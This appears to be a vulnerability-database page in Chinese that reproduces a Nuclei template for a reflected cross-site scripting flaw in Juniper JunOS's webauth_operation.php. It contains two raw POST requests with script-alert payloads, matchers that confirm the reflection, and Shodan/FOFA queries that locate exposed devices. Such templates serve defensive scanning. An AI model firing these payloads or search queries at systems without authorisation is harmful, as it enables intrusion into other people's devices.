junos-xss: JunOS - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: junos-xss | POC: 已公开

漏洞描述

PoC代码[已公开]

id: junos-xss

info:
  name: JunOS - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  reference:
    - https://labs.watchtowr.com/the-second-wednesday-of-the-first-month-of-every-quarter-juniper-0day-revisited/
  classification:
    cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: juniper
    product: junos
    shodan-query: title:"Juniper Web Device Manager"
    fofa-query: title="Juniper Web Device Manager"
  tags: junos,xss,vuln
variables:
  string: "{{to_lower(rand_base(2))}}"

http:
  - raw:
      - |
        POST /webauth_operation.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rs=emit_debug_note&rsargs[]={{string}}&rsargs[]=<script>alert('document.domain');</script>
      - |
        POST /webauth_operation.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rs=sajax_show_one_stub&rsargs[]={{string}}<script>alert('document.domain');</script>

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: word
        name: emit-debug-note-xss
        words:
          - "ERROR: <script>alert('document.domain');</script>"
          - "monospace"
        condition: and

      - type: word
        name: sajax-show-one-stub-xss
        words:
          - "<script>alert('document.domain');</script>"
          - "wrapper for"
        condition: and
# digest: 4a0a0047304502202044d7148c7a0cb750b07559a50021b8bf25ad15d3b2dedf5f481166980d6b4d022100cb1381f8e123acf840ad1dc1002de65ca93639e26012017623b9cd83ab8f6661:922c64590222798bb761d5b6d8e72950

相关漏洞推荐